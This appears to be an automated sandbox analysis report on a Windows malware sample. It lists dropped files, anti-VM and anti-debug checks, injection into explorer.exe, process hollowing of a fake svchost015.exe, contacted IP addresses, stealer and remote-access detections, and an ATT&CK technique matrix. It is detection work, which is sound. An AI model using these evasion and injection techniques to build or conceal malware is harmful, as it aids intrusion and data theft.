            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401C23 pushad ; iretd 0_2_00401C5C
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401C27 pushad ; iretd 0_2_00401C5C
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00403235 push eax; ret 0_2_00403276
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401BF2 pushad ; iretd 0_2_00401C5C
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401BF3 pushad ; iretd 0_2_00401C5C
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401BFE pushad ; iretd 0_2_00401C5C
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00403285 push eax; ret 0_2_00403276
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004010A9 push 1A43E3D0h; retf 0_2_004010B3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C5A pushad ; iretd 0_2_004A1CC3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C59 pushad ; iretd 0_2_004A1CC3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C65 pushad ; iretd 0_2_004A1CC3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C71 pushad ; iretd 0_2_004A1CC3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1110 push 1A43E3D0h; retf 0_2_004A111A
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C8A pushad ; iretd 0_2_004A1CC3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C8E pushad ; iretd 0_2_004A1CC3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00538A01 push edx; retn 0063h0_2_00538A0A
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_0053963B push 0CEB7905h; retf 0_2_00539640
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_005388D3 pushad ; iretd 0_2_00538982
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00539BC9 push eax; ret 0_2_00539BE0
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00537EF8 push 1A43E3D0h; retf 0_2_00537F02
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00539B91 push eax; ret 0_2_00539BE0
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00403245 push eax; ret 5_2_00403276
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00403265 push eax; ret 5_2_00403276
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401C0A pushad ; iretd 5_2_00401C5C
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_0040321E push eax; ret 5_2_00403276
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401C23 pushad ; iretd 5_2_00401C5C
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401C27 pushad ; iretd 5_2_00401C5C
            Source: e0OOofAl0S.exeStatic PE information: section name: .text entropy: 7.427181340563761
            Source: busaafd.1.drStatic PE information: section name: .text entropy: 7.427181340563761
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D931.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\D931.exeFile created: C:\Users\user\AppData\Local\Temp\svchost015.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\busaafdJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\busaafdJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\e0ooofal0s.exeJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\busaafd:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
            Source: C:\Users\user\AppData\Roaming\busaafdAPI/Special instruction interceptor: Address: 7FFE2220E814
            Source: C:\Users\user\AppData\Roaming\busaafdAPI/Special instruction interceptor: Address: 7FFE2220D584
            Source: e0OOofAl0S.exe, 00000000.00000002.1778931179.000000000052E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 475Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2007Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 968Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2767Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7412Thread sleep count: 475 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7420Thread sleep count: 2007 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7420Thread sleep time: -200700s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7416Thread sleep count: 968 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7416Thread sleep time: -96800s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7768Thread sleep count: 334 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7776Thread sleep count: 282 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7772Thread sleep count: 277 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7420Thread sleep count: 2767 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7420Thread sleep time: -276700s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_0041A7A0 GetSystemTimes followed by cmp: cmp dword ptr [00421ecch], 0ah and CTI: jne 0041A9C4h0_2_0041A7A0
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_0041A7A0 GetSystemTimes followed by cmp: cmp dword ptr [00421ecch], 0ah and CTI: jne 0041A9C4h5_2_0041A7A0
            Source: explorer.exe, 00000001.00000000.1767187574.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drBinary or memory string: ParallelsVirtualMachine
            Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000001.00000000.1769319687.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
            Source: explorer.exe, 00000001.00000000.1767187574.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000001.00000000.1767187574.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drBinary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
            Source: D931.exe, 00000007.00000000.2258731607.0000000000401000.00000020.00000001.01000000.00000006.sdmp, D931.exe.1.drBinary or memory string: QEMUU
            Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: explorer.exe, 00000001.00000000.1767187574.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000001.00000000.1766706025.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: explorer.exe, 00000001.00000000.1769319687.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}exeF8b
            Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A092B mov eax, dword ptr fs:[00000030h]0_2_004A092B
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A0D90 mov eax, dword ptr fs:[00000030h]0_2_004A0D90
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00536C8B push dword ptr fs:[00000030h]0_2_00536C8B
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_005B092B mov eax, dword ptr fs:[00000030h]5_2_005B092B
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_005B0D90 mov eax, dword ptr fs:[00000030h]5_2_005B0D90
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_007A71A3 push dword ptr fs:[00000030h]5_2_007A71A3
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeMemory protected: page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeFile created: busaafd.1.drJump to dropped file
            Source: C:\Windows\explorer.exeNetwork Connect: 102.189.104.201 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 191.96.144.157 443Jump to behavior
            Source: Yara matchFile source: Process Memory Space: D931.exe PID: 7888, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeCode function: 7_2_030AA090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_030AA090
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeThread created: C:\Windows\explorer.exe EIP: 31619B0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdThread created: unknown EIP: 87C19B0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exeJump to behavior
            Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765127718.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_0041A7A0 InterlockedExchange,SetConsoleTitleA,GlobalSize,FindAtomW,SearchPathW,SetConsoleMode,GetDefaultCommConfigW,CopyFileExA,GetEnvironmentStringsW,WriteConsoleOutputW,GetNumaNodeProcessorMask,DebugActiveProcessStop,GetUserDefaultLangID,RtlLeaveCriticalSection,LoadLibraryA,GetSystemTimes,FoldStringW,GetConsoleAliasesLengthA,CallNamedPipeA,GetComputerNameA,GetConsoleAliasExesLengthW,GlobalAlloc,LoadLibraryW,GlobalSize,InterlockedDecrement,0_2_0041A7A0

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 7940, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 7940, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            812
            Process Injection
            11
            Masquerading
            OS Credential Dumping11
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Shared Modules
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            3
            Virtualization/Sandbox Evasion
            LSASS Memory421
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)Logon Script (Windows)1
            Disable or Modify Tools
            Security Account Manager3
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook812
            Process Injection
            NTDS3
            Process Discovery
            Distributed Component Object ModelInput Capture115
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Hidden Files and Directories
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing
            DCSync113
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            File Deletion
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
